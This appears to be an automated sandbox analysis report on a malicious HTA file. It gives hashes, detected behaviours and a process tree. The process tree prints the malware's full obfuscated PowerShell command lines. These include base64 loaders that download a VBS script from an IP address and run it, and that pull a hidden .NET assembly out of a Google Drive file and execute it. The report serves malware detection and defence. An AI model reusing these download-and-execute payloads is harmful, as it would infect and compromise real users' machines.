Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-10-2024 12:49
Static task
static1
Behavioral task
behavioral1
Sample
bestintercomthingswhichgivebestthingstogetmeback.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bestintercomthingswhichgivebestthingstogetmeback.hta
Resource
win10v2004-20241007-en
General
-
Target
bestintercomthingswhichgivebestthingstogetmeback.hta
-
Size
131KB
-
MD5
6d739d6533520e553037e609fe0530d9
-
SHA1
4fd1330dabaa0a32e7ea25ab462ea19acf14cb98
-
SHA256
d1f9d23d0edf09bfafba1ecc9a34783a4bb3761f2eceab302bdb368a6e2ea144
-
SHA512
b604ced91e154fa98cded0aeb124ef42a4bd2206cb4e0ed9d81b1fcd9f43031e24c53ac2ccb10598493ad8bbb4d0e3441d71b2cb114db06955a0024b69c4e2b8
-
SSDEEP
96:4vCt7Q3lBAWVffN1klyKByKcwfz56KeqQ:4vCF2Vfcy2yUQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1148 PowERshEll.eXE 6 2024 powershell.exe 8 2024 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1852 powershell.exe 2024 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2680 powershell.exe 1148 PowERshEll.eXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowERshEll.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1148 PowERshEll.eXE 2680 powershell.exe 1148 PowERshEll.eXE 1148 PowERshEll.eXE 1852 powershell.exe 2024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1148 PowERshEll.eXE Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2492 wrote to memory of 1148 2492 mshta.exe 31 PID 2492 wrote to memory of 1148 2492 mshta.exe 31 PID 2492 wrote to memory of 1148 2492 mshta.exe 31 PID 2492 wrote to memory of 1148 2492 mshta.exe 31 PID 1148 wrote to memory of 2680 1148 PowERshEll.eXE 33 PID 1148 wrote to memory of 2680 1148 PowERshEll.eXE 33 PID 1148 wrote to memory of 2680 1148 PowERshEll.eXE 33 PID 1148 wrote to memory of 2680 1148 PowERshEll.eXE 33 PID 1148 wrote to memory of 2812 1148 PowERshEll.eXE 34 PID 1148 wrote to memory of 2812 1148 PowERshEll.eXE 34 PID 1148 wrote to memory of 2812 1148 PowERshEll.eXE 34 PID 1148 wrote to memory of 2812 1148 PowERshEll.eXE 34 PID 2812 wrote to memory of 2744 2812 csc.exe 35 PID 2812 wrote to memory of 2744 2812 csc.exe 35 PID 2812 wrote to memory of 2744 2812 csc.exe 35 PID 2812 wrote to memory of 2744 2812 csc.exe 35 PID 1148 wrote to memory of 2784 1148 PowERshEll.eXE 37 PID 1148 wrote to memory of 2784 1148 PowERshEll.eXE 37 PID 1148 wrote to memory of 2784 1148 PowERshEll.eXE 37 PID 1148 wrote to memory of 2784 1148 PowERshEll.eXE 37 PID 2784 wrote to memory of 1852 2784 WScript.exe 38 PID 2784 wrote to memory of 1852 2784 WScript.exe 38 PID 2784 wrote to memory of 1852 2784 WScript.exe 38 PID 2784 wrote to memory of 1852 2784 WScript.exe 38 PID 1852 wrote to memory of 2024 1852 powershell.exe 40 PID 1852 wrote to memory of 2024 1852 powershell.exe 40 PID 1852 wrote to memory of 2024 1852 powershell.exe 40 PID 1852 wrote to memory of 2024 1852 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bestintercomthingswhichgivebestthingstogetmeback.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\winDoWSpOwERshelL\V1.0\PowERshEll.eXE"C:\Windows\systeM32\winDoWSpOwERshelL\V1.0\PowERshEll.eXE" "PoWErSHeLl -EX BypAsS -noP -w 1 -C devIcecREDeNtIAldePLoYMenT ; iEX($(ieX('[system.TExT.eNCOdiNg]'+[CHar]0X3a+[cHAr]0x3A+'Utf8.GetSTrIng([SySTeM.cOnvErT]'+[cHAR]0x3a+[cHAR]0X3a+'fROmbaSe64sTring('+[Char]34+'JGEyM3BBZ0VFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRFZmlOSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlDa0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNBS25JVFZWYWpwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFpwaE5oak9vRixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWtnWkhxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhVGNWY0ZBIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx3T1RlbFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYTIzcEFnRUU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xMDEuOC83MDEvc2VldGhlYmVzdHRoaW5nc3dpaGljaGlnZXRmb3JmdW50b2dldG1lYmFja3dpdGgudElGIiwiJGVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aWhpY2hpZ2V0Zm9yZnVudG9nZXRtZWJhY2t3LnZiUyIsMCwwKTtTdGFydC1TbEVFUCgzKTtzdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aWhpY2hpZ2V0Zm9yZnVudG9nZXRtZWJhY2t3LnZiUyI='+[cHaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypAsS -noP -w 1 -C devIcecREDeNtIAldePLoYMenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6o8ndmmf.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7AA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7A9.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2744
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswihichigetforfuntogetmebackw.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMXR3aW1hZ2VVcmwgPSBGenhodHRwczovL2RyaXZlLmdvJysnb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnJysnSkpKdjFGNnZTNHNVT3libkgtc0QnKyd2VWhCWXd1ciBGeng7MXR3d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsxdHdpbWFnZUJ5dGVzID0gMXR3d2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YSgxdHdpbScrJ2FnZVVybCk7MXR3aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuJysnY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMXR3aW1hZ2VCeXRlcyk7MXR3c3RhcnRGbGFnICcrJz0gRnp4PDxCQVNFNjRfU1RBUlQ+PkZ6eDsxdHdlbmRGbGFnID0gRnp4PDxCQVNFNjRfRU5EPj5Geng7MXR3c3RhcnRJbmRleCA9IDF0d2ltYWdlVGV4dC5JbmRleE9mKDF0d3N0YXJ0RmxhZyk7MXR3ZW5kSW5kZXggPSAxdHdpbWFnZVRleHQuJysnSW5kZXhPZigxdHdlbmRGbGFnKTsxdHdzdGFyJysndEluZGV4IC1nZSAwIC1hbmQgMXR3ZW5kSW4nKydkZXggLWd0IDF0d3N0YXJ0SW5kZXg7MXR3c3RhcnRJbmRleCArPSAnKycxdHdzdGFydEZsYWcuTGVuZ3RoOzF0d2Jhc2U2NExlbmd0aCA9IDF0d2VuZCcrJ0luZGV4IC0gMXR3c3RhcnRJbmRleDsxdHdiJysnYXNlNjRDb21tYW5kID0gMXR3aScrJ21hZ2VUZXh0LlN1YnN0cmluZygxdHdzdGFydEluZGV4LCAxdHdiYXNlNjRMZScrJ25ndGgpOzF0d2InKydhc2U2NFJldmVyc2VkID0gLWpvaW4gKDF0Jysnd2Jhc2U2NENvbW1hbmQuVG9DJysnaGFyQXJyYXknKycoKSBOWWggRm9yRWFjaC1PYmplY3QgeyAxdHdfJysnICcrJ30pWy0xLi4tKDF0d2InKydhc2U2NENvbW1hbmQuTGVuZ3RoKV07MXR3Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXInKyd0XTo6RnJvbUJhc2U2NFN0cmluZygxdHdiYXNlNjRSZXZlcnNlZCk7MXR3bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2EnKydkKDF0d2NvbW1hbmRCeXRlcyk7MXR3dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChGenhWQUlGengpOzF0d3ZhaScrJ00nKydldGhvZC5JbnZvaycrJ2UoMXR3bnVsbCwgQChGenh0eHQuQlJFRVJFLzEwJysnNy84LjEwMS4zLjInKyc5MS8vOnB0dGhGengsIEZ6JysneGRlc2F0aXZhZG8nKydGengsIEZ6eGRlc2F0aXZhZG9GeicrJ3gsIEZ6eGRlc2F0aXZhZG9GengsIEZ6eENhc1BvbEZ6eCwgRnp4ZGVzYXRpdmFkJysnb0Z6eCwgRnp4ZGVzYXRpdmFkb0Z6eCxGenhkZXNhdGl2YWRvRnp4JysnLEZ6eGRlc2F0aXZhZG9GengsRnp4ZGVzYXRpdmFkb0Z6eCxGenhkZXNhdGl2YWRvRnp4LEZ6eGRlc2F0aXZhZG9GengsRnp4MUZ6eCxGengnKydkZXNhdGknKyd2YWRvRnp4KSk7JyktQ3JFUGxBQ2UgIChbY0hhUl03MCtbY0hhUl0xMjIrW2NIYVJdMTIwKSxbY0hhUl0zOS1DckVQbEFDZSAnMXR3JyxbY0hhUl0zNiAtQ3JFUGxBQ2UnTlloJyxbY0hhUl0xMjQpfC4gKChnZVQtVkFyaUFCTEUgJypNZHIqJykubkFNRVszLDExLDJdLWpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('1twimageUrl = Fzxhttps://drive.go'+'ogle.com/uc?export=download&id=1AIV'+'g'+'JJJv1F6vS4sUOybnH-sD'+'vUhBYwur Fzx;1twwebClient = New-Object System.Net.WebClient;1twimageBytes = 1twwebClient.'+'DownloadData(1twim'+'ageUrl);1twimageText = [System.Text.En'+'coding]::UTF8.GetString(1twimageBytes);1twstartFlag '+'= Fzx<<BASE64_START>>Fzx;1twendFlag = Fzx<<BASE64_END>>Fzx;1twstartIndex = 1twimageText.IndexOf(1twstartFlag);1twendIndex = 1twimageText.'+'IndexOf(1twendFlag);1twstar'+'tIndex -ge 0 -and 1twendIn'+'dex -gt 1twstartIndex;1twstartIndex += '+'1twstartFlag.Length;1twbase64Length = 1twend'+'Index - 1twstartIndex;1twb'+'ase64Command = 1twi'+'mageText.Substring(1twstartIndex, 1twbase64Le'+'ngth);1twb'+'ase64Reversed = -join (1t'+'wbase64Command.ToC'+'harArray'+'() NYh ForEach-Object { 1tw_'+' '+'})[-1..-(1twb'+'ase64Command.Length)];1twcommandBytes = [System.Conver'+'t]::FromBase64String(1twbase64Reversed);1twloadedAssembly = [System.Reflection.A'+'ssembly]::Loa'+'d(1twcommandBytes);1twvaiMethod = [dnlib.IO.Home].GetMethod(FzxVAIFzx);1twvai'+'M'+'ethod.Invok'+'e(1twnull, @(Fzxtxt.BREERE/10'+'7/8.101.3.2'+'91//:ptthFzx, Fz'+'xdesativado'+'Fzx, FzxdesativadoFz'+'x, FzxdesativadoFzx, FzxCasPolFzx, Fzxdesativad'+'oFzx, FzxdesativadoFzx,FzxdesativadoFzx'+',FzxdesativadoFzx,FzxdesativadoFzx,FzxdesativadoFzx,FzxdesativadoFzx,Fzx1Fzx,Fzx'+'desati'+'vadoFzx));')-CrEPlACe ([cHaR]70+[cHaR]122+[cHaR]120),[cHaR]39-CrEPlACe '1tw',[cHaR]36 -CrEPlACe'NYh',[cHaR]124)|. ((geT-VAriABLE '*Mdr*').nAME[3,11,2]-joIN'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5429b342e73e91557a9390ac523d9480d
SHA13c5ae793e52f844b9348734e9c3b50a336184038
SHA2564fcee6ae2d9612d72a00cfa156edb827fb8dc9877b2a4f5c377df359190c5e05
SHA5128bd712b60e380bcf001144cc7650818d03a04fdc77adfd8895f8b85b6cbc221285c8e5baf1aa1aacf968b6f81ea656cfdd1e78deeb5b64671c44a9958450dfe0
-
Filesize
7KB
MD5f9dc9a59690056a2789bced174a8278c
SHA197b9ad7e2ce3e46b704091609bad1881859b6268
SHA256f1c11e6bbb5da6016fb3c6c24d8e88c4c10cc042a9120708040ab1277359a16e
SHA512b4f4d2fdcd4036d9cf79fab82c648f6111a760f2eb5c302bb3f92a148debc07468a4c40f7e5f81c84f6eb6189dcb6e31dc3f1b8a6ee670b11925547438103626
-
Filesize
1KB
MD50f62723f55e7bdde4e7b966d7e31b8b7
SHA1e5e2093a24435b239c5b8e01973764e5dfdc1e59
SHA25649776851989c7e244cd887a8182ad05d22ba1bb55d060358910603d4739ff987
SHA5121daeadf46f7ad760debb5bd6843c13218f09ab3fee86324d2c708ff0899fae0394e8aaaac0d0121f36a6022b49a47c371505b3a967006074022b45e6bbe844b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD597576301e2bdd33be4530e72802ab72a
SHA14b3c5de07c843d62653042b60cf95a8eff9d0184
SHA25621ad06962d92e7e3454381a370be1a8be8ee9a0e00403f1009b7fb0fc875e89b
SHA512cd6fa1f4db7c570afe99c16aabc33144cc11a2d3405f133f0fb998826a97549807e365528b369b76ddb7d1671d08d7946bd97e0755a33c0fd44fa57b98a9fa48
-
Filesize
137KB
MD5e6d880000e2f1fba6197eb7f0102ef53
SHA1381787c69d90dc1a9cc40cf677fb6c205bdd2c47
SHA2568d87b46e915f6c70c618cf5a4e54136a7575c599a6a9f148ce05c237ebbb29ba
SHA5125956d52dd97ce7fe787ca8f88edd643010299eb4ba90e06afbbe352cff582a24d35527995a1d09b82c09c3467861024bce01933916b58de0ba8d11039787a0eb
-
Filesize
468B
MD5db947694e3bc54f29750dca004646e3e
SHA10aea07a3e0ffecd2a2f3f3aa17a8937a33775824
SHA25654f4693381f3d905fad56fa071f27152f05216c53421bc01535e182d93cb2ea3
SHA5124ffbc8386cbf7a4046fef2855484bf6cd890e33fe77fb1753f5801c9e90e22894b2c9c6cdf02f739829c3e0935d5df485ec7ae0ca4d89fb5108ec1d03403fa70
-
Filesize
309B
MD57184fc3b6452b33c75be70186b70e552
SHA19ae62a157b509e5342ccfbf7c0a1958e356f1c7d
SHA256cbdee60b564478017a8b0e0f3e9f5543b63741610b295a3ff489a2df512aba3b
SHA512211420f483b57d73c21856b2dbcc1f4d76e4bdbf9db8083a605b6d3eac58a1286cc21dc3f34d46908dbf584773452b46cd95232d99a1d6069bd0206f9b27a141
-
Filesize
652B
MD58abf1cfb352a5f3d206eab408f7afb65
SHA1f8caf1664e9fe24473ba9eac720990196b387e94
SHA256fc836c5867fd4c4a687fc8b49a6256f44f424435a4cc2689f2745f6b86fb80ce
SHA512aecafba1a1d6a7c940881b4be6891ffedd8a44097335934c10a84be9851074b363db621f40f7549e8c513ad8859b3ead85c2e356e8506bbbf416c81206b8c0f6